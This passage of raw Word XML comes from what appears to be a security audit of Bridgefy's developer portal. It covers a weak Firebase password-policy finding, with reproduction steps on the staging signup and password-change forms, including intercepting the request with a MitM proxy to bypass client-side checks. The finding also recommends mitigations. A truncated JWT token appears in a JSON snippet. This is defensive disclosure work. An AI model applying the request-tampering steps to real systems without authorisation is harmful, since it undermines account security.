          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ce"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleH[...]aq Ar41xDf3aqs"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"5.0.9"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="33"/>
        <w:ind w:right="3596"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Users Steps to Reproduce - Registration form:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="221" w:lineRule="exact" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Signup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>form:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me/auth/account-information</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>signup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accepts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Reproduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>form:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>account:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="371" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>12345678 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as the new password and verify that the “Save Password” button is not activated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="370" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as the new password, intercept the request using a MitM proxy (i.e. BurpSuite, OWASP ZAP, Fiddler) and change the password value to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>12345678</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accepts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>12345678</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stricter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="38"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>approach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="0" w:bottom="0" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="372" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>accomplish this could be to switch from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Firebase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google Identity Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, and then enable a password policy in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google Identity Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP Authentication Cheat Shee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250049" w:id="6"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>MitM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
